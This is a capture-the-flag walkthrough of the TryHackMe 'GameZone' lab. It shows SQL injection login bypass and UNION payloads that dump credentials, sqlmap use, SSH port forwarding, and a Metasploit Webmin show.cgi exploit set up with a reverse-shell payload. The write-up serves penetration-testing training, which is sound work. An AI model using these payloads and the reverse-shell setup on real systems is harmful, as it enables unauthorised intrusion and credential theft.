GameZone | SQLi & Port Forwarding

GameZone is a challenge that encompasses and shows how a simple vulnerable user input field can lead to database exploitation, credentials, portforwarding and ultimately through to remote code execution.

by Johann Van Niekerk

GameZone | SQLi & Port Forwarding

Share

💡
Disclaimer: All topics discussed are intended solely for research purposes and not intended or endorsed for illegal activity.

GameZone is another TryHackMe challenge that explores some SSH, Portforwarding and SQLi techniques in order to bypass and exploit a vulnerable system.

GameZone Write up

Tackling SQLi & Portforwarding

Target Network Report

Name of Target:

GameZone

System Enumeration

NMAP SCAN:

# NMAP SCAN
sudo nmap -sV -Pn -p22,80 -T4 10.10.155.97
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-06 05:32 EST
Nmap scan report for 10.10.155.97
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

After the initial NMAP scanning; prioritising the most likely culprit is going to be best practice. While Port 22 is likely to contain the entry into the system, normally SSH is relatively secure unless you know usernames and some likely credentials at that.

The first enumeration will be Port 80 that is a webservice running on HTTP.

It is important to navigate and explore webservices entirely to understand the target and the likely attack surface. Attempt all user entries, quick visual scan over all text and images as well as links embedded. The target here is to test whether user input produces any results or if anything is reflected back through the URL or otherwise.

Exploring the site, after the first few attempts, then it is time to see how the database reacts with a simple True statement: ' or 1=1;-- -.

In this case when testing it, only the username field was susceptible and it was relatively simple as the True statement was successful to bypass the login page to reach the portal.php address.

Log in field Vulnerable

/portal.php

With the SQL injection, it is now possible to access the /portal.php page that presents a Search bar function with two fields, title and review.

Again, with the search bar it is possible to play with the reactions. Firstly attempting "test" returns nothing, using numbers such as "1" returns nothing. Falling back to the True statement produces results as it displays numerous entries. This confirms the suspicions that it is likely to be SQL injections to get further.

Auto SQLmap Method

It is possible to automate the exploitation with SQLMAP to inject and discover confidential information. For this, it is easy to simply save the output from Burp Suit into a textfile and using this file with SQLMAP to filter and interprete with its tooling.

In order to do this, run Burp Suite to capture the traffic requests and response and then submit a 'test' inquiry on the webpage to get the data.

POST Request
#BURPSUITE
    launch burpsuite
    capture 'POST' request by sending test inquiry on page
    right click and save the request to a file. i.e 'burp'
    
#SQLMAP
    sqlmap -r burp --dbms=mysql --dump
Steps to utilise Burp with SQLmap

The password hash and username was uncovered. This hash can now be cracked or used for further exploitation.

Manual SQLi Method

The method to complete this enumeraiton without using sqlmap is as follows: group_concat(expr) is used in order to not necessarily have to rely on larger columns sizes and can operate on a single column being reflected back. This will become clear in the following notes as to what is meant. This will also be displayed with the info in a human-readable way.

Again, it is important to test the user input on the search bar

#DETERMINE COLUMNS IN DATABASE
    #Start with 1 then 1,2 then 1,2,3 then 1,2,3,4 and so on
    ' union select 1,2,3;-- -

It is possible to understand that the columns are a total of 3, whereby column 'name' 2 and 3 are reflected or visible on the page.

Gather more information!

#DUMP USER() and DATABASE()
    ' union select 1,2,user();-- -
    ' union select 1,2,database();-- -

What is possible now is to either dump all Table names and information through the Schema or since the database name is clear 'db'; likely better to target directly.

#DUMP ALL FROM SCHEMA
    #INFO OVERLOAD
    ' union select 1,table_schema,table_name from information_schema.tables;-- -
#DUMP SPECIFIC DATABASE
    ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='db';-- -
    #takes in the argument with the name of the Database gathered from database()

See above, with group_concat() it has both table names displayed within the single column.

#DUMP COLUMN NAMES in Users
    ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users';-- -
#DUMP username,pwd
    ' union select 1,2,group_concat(username,':',pwd SEPARATOR '<br>') from users;-- -
    
    #username,':',pwd: used to display in a user:pass format otherwise it gets combined into a single string
    #SEPARATOR '<br>': used to separate each entry on a separate line (in this case there was only 1 user:pass single line)

The above command gets dumped in a convenient 'username:hash' method that is much more human readable. If there was 10 entries then group_concat() would have them listed and separated on each line within the same column.

With this, it was possible to enumerate on the SQL database and retrieve the hashes manually as well

Port 22

With the hash cracked and the username; it is now a game of searching where these credentials can be used. If you recall there was Port 22 open and that will be the first target.

The credentials were successful and allowing access to remote to the host as a user.

The initial flag is located in the home directory:

Testing several methods of privilege escalation resulted in finally checking for any listening or blocked ports.

#CHECK LISTENING PORTS
    ss -tulpn               :Display all listening UDP, TCP processes

The system checks uncover that there is a locally listening Port 10000 that is an unusual port to begin with. This is interesting to uncover and will be the first target.

Normally this content will only be accessible by the host but in order for the attacker to access this content; taking advantage of SSH Portforwarding will make it a breeze.

#SSH Portforwarding
    ssh -L 10000:localhost:10000 agent47@10.10.35.7                 :[Attacker Machine]

With this successfully run and ssh is logged in, the port is now forwarded and accessible by the attacker; it is now possible to access the content and it is no surprise to see that it is a webservice.

If paying attention and still using Burp Suite, then it is possible to draw the version information on what is currently the Webmin.

The banner when visiting the page it becomes evident to see it as webmin 1.580.
Additionally it is possible to use the same credentials and login as agent47.

The next step is to find information on this service and if there is any reported vulnerabilities.

After reviewing exploits, it becomes certain that the webservice is vulnerable and it is vulnerable to Remote Code Execution:

#VULNERABILITY
The vulnerability exists in the /file/show.cgi component and allows an authenticated user, with access to the File Manager Module, to execute arbitrary commands with root privileges.

Without Metasploit

Knowing the vulnerability allows authenticated user to complete RCE by navigation, then it is possible to send commands or exploit to get a connection. As a proof of concept tt is possible by going $RHOST/file/show.cgi/etc/passwd .

Similarly we can get the flag by going /root/root.txt

With Metasploit

Searching for webmin 1.58 has found the same exploit as before, intended for use with metasploit
Setting the appropriate options and remembering that access is through a tunnel, it is not through the remote IP but through the 127.0.0.1 localhost ip:

#use /unix/webapp/webmin_show_cgi_exec
    set rhost 127.0.0.1
    set username agent47
    set password *******
    set ssl false
    set lhost tun0
    set payload cmd/unix/reverse
    run

There you have it. Tackling this challenge with automated tools such as SQLmap and Metasploit as well as doing them manually has shown the benefits of either side. Hopefully it was beneficial and you were able to take some things away from this.

And finally, if you enjoyed the content and want to see more; I need coffee to stay awake and this is not a bribe. 👌